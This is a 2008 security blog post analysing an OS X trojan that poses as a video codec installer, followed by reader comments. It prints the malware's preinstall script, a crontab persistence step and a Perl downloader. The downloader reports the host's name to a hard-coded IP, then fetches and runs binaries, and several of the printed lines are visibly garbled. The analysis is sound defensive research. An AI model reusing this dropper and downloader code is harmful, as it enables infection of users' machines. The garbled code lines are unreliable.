Posted on Monday, November 24th, 2008 | Bookmark on del.icio.us

New OS X Malcode: Not Just a DNSChanger

by Jose Nazario

Seems that Apple’s OS X has been taking a minor beating in the malcode front lately, as noted in the blog post New Trojans Strike OS X from CA. I got a copy of it last night and had a look, I wanted to see what the OS X malcode community was up to. The answer is both nothing much (it’s like we stepped back to 1999) and some new stuff (new approaches not yet seen in the OS X world, but old hat on Windows).

I became aware of the malcode through this URL shared in a ShadowServer link report:

http://online-channels.net/[REMOVED]/spam.txt

which yields the message “LOL look what the kid does to himself >> http://online-channels.net/[REMOVED]/random/1696/0/ :P :| !”, which will get spammed out in some message layer. About that hostname and IP, it’s located in the Netherlands (abuse contact has been made, we’ll see about takedown). It’s User-agent aware and delivers a Mac executable for folks on OS X and a Windows EXE for other folks.

online-channels.net A INET 89.248.172.213
AS      | IP               | AS Name
29073   | 89.248.172.213   | ECATEL-AS AS29073, Ecatel Network

If you visit the website you see something like this that leads to a “install this codec” response.

Jahlav_A_download.png

I’m sure you can see why I was suspicious: running this on an OS X system produces a fake Windows XP dialogue box. So I downloaded it and had a look. It’s an OS X DMG file named “cold-live7000.dmg”.

MD5(eaac894f299d15e75f48d99e4d9b254f)  cold-live7000.dmg

The OS X version of this file has very poor AV detection according to VirusTotal. The Windows EXE (MD5 = 042d747ac1494035fa4e26845aebfddc) has 7/32 detected in VirusTotal, using names like “TR/DNSChanger.hkx”, “Win32:FaDrop”, “TrojanDropper:Win32/Alureon.gen!B”, “a variant of Win32/Kryptik.BT”, and “Mal/BadNSIS”. It contacts a different host:

AS      | IP               | AS Name
29073   | 94.102.60.56     | ECATEL-AS AS29073, Ecatel Network

Right next door to the OS X server (see below).

When you mount it under OS X you get a volume named “install.pkg”. For those of you not used to OS X, install.pkg is a typical name for an installer (.pkg is common in OS X). Nothing too up-and-up yet! Let’s start digging in:

o:/Volumes/install.pkg/install.pkg/Contents jose$ ls -lrt
total 96
drwxr-xr-x   8 jose  jose    272 Nov 15 12:35 Resources
-rw-r--r--   1 jose  jose      9 Nov 15 12:35 PkgInfo
-rw-r--r--   1 jose  jose   3277 Nov 15 12:35 Archive.pax.gz
-rw-r--r--   1 jose  jose  35617 Nov 15 12:35 Archive.bom
-rw-r--r--   1 jose  jose   1329 Nov 15 12:35 Info.plist

So far this looks … well, interesting. Let’s first dig into the Resources subdirectory, that usually has the very intriguing bits:

o:/Volumes/install.pkg/install.pkg/Contents/Resources jose$ ls -lrt
total 48
-rwxr-xr-x   1 jose  jose  8027 Oct 28 10:43 License
-rwxr-xr-x   1 jose  jose  2189 Nov 15 12:35 preupgrade
-rwxr-xr-x   1 jose  jose  2189 Nov 15 12:35 preinstall
-rw-r--r--   1 jose  jose    17 Nov 15 12:35 package_version
drwxr-xr-x   3 jose  jose   102 Nov 15 12:35 en.lproj
-rw-r--r--   1 jose  jose   545 Nov 15 12:35 BundleVersions.plist

The files “preupgrade” and “preinstall” do not differ, they’re shell scripts:

o:/Volumes/install.pkg/install.pkg/Contents/Resources jose$ less
preinstall
#!/bin/sh
if [ $# != 1 ]; then type=0; else type=1; fi && tail -35 $0 | uudecode -o
/dev/stdout | sed 's/applemac/AdobeFlash/' | sed 's/bsd/7000/' | sed
's/gnu/'$type'/' >`uname -p` && sh `uname -p` && rm `uname -p` && exit
begin 777 withlove
M159)3#TB87!P;&5M86,B"G!A=&@](B],:6)R87)Y+TEN=&5R;F5T(%!L=6&ES=#U@8W)O;G1A8B`M;'QG

(Truncated) If we UUdecode that block (withlove) we get another script:

o:/Volumes/inspkg/install.pkg/Contents/Resources jose$ uudecode -o
/dev/stdout /tmp/withlove.uue
EVIL="applemac"
path="/Library/Internet Plug-Ins"
exist=`crontab -l|grep $EVIL`
if [ "$exist" == "" ]; then
     echo/5 * * * \"$path/$EVIL\" 1>/dev/null 2>&1" > cron.inst
     crontab cron.inst
     rm cron.inst
fi
#
tail -21 $0 | uudecode -o /d7777/bsd/' | sed 's/typeofrun/gnu/' | perl &&
exit
begin 666 jah
M(R$O=7-R+V)7)L"G5S92!)3SHZ4V]C:V5T.PIM>2`D:7`](CDT+C$P
M,BXV,"XQ,#8B+"1A;G-W97(](B(["FUY("1R=6YT>7!E/71Y<&5O9G);CL*
M"G-U8B!T<@/2!S:&EF=#L*"21S=')I;F<@
M/7X@<

(Truncated again) The first part of that will install a crontab entry (scheduled job) to look for new malcode (as the installed user) every five minutes via the script it's about to install. The UUencoded archive "jah" is a Perl script:

:/Volumes/install.pkg/install.pkg/Contents/Resources jose$ cat
/tmp/jah.uue | uudecode -v/stdout | sed 's/7777/7000/' | sed
's/typeofrun//'
#!/usr/bin/perl
usmy $ip="94.102.60.106",$answer="";
my $runtype=;
#
sub trim($)
{
         my $string = shift;
         $string =~ s/\r//;
         $s =~ s/\n//;
         return $string;
}
#
my $socket=IO::Socket::INET->new(PeerAddr=>"$ip",PeerPort=>"8roto=>"tcp")
or return;
print $socket "Gtor.pl HTTP/1.0\r\nUser-Agent: ".trim(`uname
-p`).";$runtype;".trim(`hostname`).";\r\n\r\n";
#
while(<$socket>){ $answer.=$_;}
close($socket);
#
my $data=substr($wer,index($answer,"\r\n\r\n")+4);
if($answer=~/Time: (.*)\r\n/)
{
     my $cpos=0,@pos=split(/ /,$1);foreach(@pos)
     {
         my $file="/tmp/".$_;
		 #
         open(FILE,">".$file);
         print FILE sr($data,$cpos,$_);
         close(FILE);
		 #
         chmod 0755, $file;
         system($file);
		 #
         os+=$_;
     }
}

And with this your box is downloading various malcode, they know what you're running, and further exploits are possible.

Earlier today the malcode phoned home to this HTTP server in AS29073 in the Netherlands:

AS29073   | 94.12.60.106    | ECATEL-AS AS29073, Ecatel Network

Now that same server has moved to the UK:

AS4589    | 94.12.60.106     | EASYNET Easynet Group Plc

It's no longer responding for me, it's possible that Easynet took care of it.

UPDATE
I've been editing this post for the past hour or so adding new details as they come in. In addition to the single Windows sample I posted above, a handful more related samples have shown up in our database in the past week:

2008-11-24      KuLightCadecPock3373.exe
2008-11-24      http://xxxlexelink.com/[REMOVED]/pathexe.php?id=3373&na...
2008-11-23      http://cold-live.net/[REMOVED]/Xvid.Codec.Upda...
2008-11-22      http://mamasplanet.com/[REMOVED]/samplevideo.php
2008-11-21      6c9d833b1914341e9facea439ef7...
2008-11-20      keygen_Malware_Defender_1_0_1_3552.exe
2008-11-19      http://www.beautypornpost.com/[REMOVED]/movie...
2008-11-18      http://www.babespornmovies.com/[REMOVED]/fr...
2008-11-18      http://tasty-moms.com/[REMOVED]/video.php
2008-11-18      http://bitchysexymoms.com/[REMOVED]/mov.php

These samples connect to 94.102.60.56, but one of them connects to 78.157.142.108, located in UltraNet:

AS      | IP               | AS Name
35057   | 78.157.142.108   | ULTRANET-AS UltraNet Ltd.

That ISP is appearantly in Latvia (.lv) … The Windows EXEs also POST to a script on the web server to announce their infections and get new binaries.

What’s even more interesting is the degree of investment this team has made in OS X malcode. They’ll be making new infections, it seems, for some time to come with that configurable loader.

This entry was posted on Monday, November 24th, 2008 at 3:23 pm and is filed under Backdoors, Malware, Trojan Horses. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

9 Responses | Add your own



Comment Post by: About recent OSX Trojan « Threat Researcher — November 25th, 2008 @ 4:06 am EST  Reply

[...] ArborNetworks: New OS X Malcode: Not Just a DNSChanger [...]

Comment Post by: Experiencia Personal » Más sobre el troyano en Mac OS X — November 25th, 2008 @ 1:22 pm EST  Reply

[...] foro de Macurium me ha comentado que en una página se habla más sobre este tema. Esta página es Arbor Networks, una empresa dedicada a la seguridad en [...]

Comment Post by: Experiencia Personal — November 25th, 2008 @ 1:26 pm EST  Reply

Hi, i have been infected by this troyan or a similar one. I was able to clean it, but it drove me crazy.

Comment Post by: Interesting Information Security Bits for 11/25/2008 at Infosec Ramblings — November 25th, 2008 @ 6:51 pm EST  Reply

[...] Some nastiness that preys on Mac OS X. Not anything new, but worth noting. New OS X Malcode: Not Just a DNSChanger | Security to the Core | Arbor Networks Security [...]

Comment Post by: cheapRoc — November 25th, 2008 @ 11:12 pm EST  Reply

Congrats, this is the lamest excuse for malware on the Mac if I’ve ever seen one. Its a shell script, which sets up crontab with some executable… which all of this has to be run by the users, mounting a disk image, launching the installer and giving it sudo access.

I think I used to write more impressive DOS trojans in Pascal for Renegade BBS software back in 1992… please this is LAME!

Comment Post by: cw — December 1st, 2008 @ 1:40 pm EST  Reply

It doesn’t matter if this is “LAME” – people WILL fall for it. I work in a .edu environment and there are all kinds of people clicking on everything under the sun. It’s a hard problem to solve and it’s not easily solved with technology. In the meanwhile, messages like this from Jose who has time to perform this analysis are useful to us and others that lack the time & resources to do as much analysis as we’d like to.

Comment Post by: Nicholas Ptacek — December 1st, 2008 @ 2:33 pm EST  Reply

Greetings,
I was wondering if it would be possible for you to send us samples of the new DNSChanger variant for OS X for further analysis. Thank you for your time and assistance!

Comment Post by: matt — December 19th, 2008 @ 3:17 am EST  Reply

I fell for it – its definitely this macaccess installer Osxjahlava trojan and now have no idea what to do
(btw – i got this thru trying to download a firefox plugin for craigslist called Clpicview

In trying to fix this situation, i keep coming across sites that describe it but no resource for fixin and removing it

i also come across sites claiming to be able to fix it if you buy their software

there are other sites that mention an online scan but upon careful readin it looks like its for uploading files to be scanned and screened? which makes sense cause i cant imagine an online service that remote fixes and eliminates this trojan for me.

virus barrier apparently does the trick but the trail version only allows you to detect and not fix it? and i dont want to buy the program because im afraid to use my computer to buy anything nor do i want to wait to tomorrow to fix it!

i dont know who to trust and worse, i dont even know what kind of danger I’m in.

can anyone help me?

Comment Post by: matt — December 19th, 2008 @ 4:47 am EST  Reply

update: i downloaded the DNSChangerRemovalTool

My DNS is back to normal but I still have this Adobe Flash in my cron search. after reading several articles tonite, it does seem like that that cron is either wrongly accused of wrong doin or indeed is part of the culprit. Anyone know for sure.. and if it is bad? how do i get rid of that?!

Leave a Comment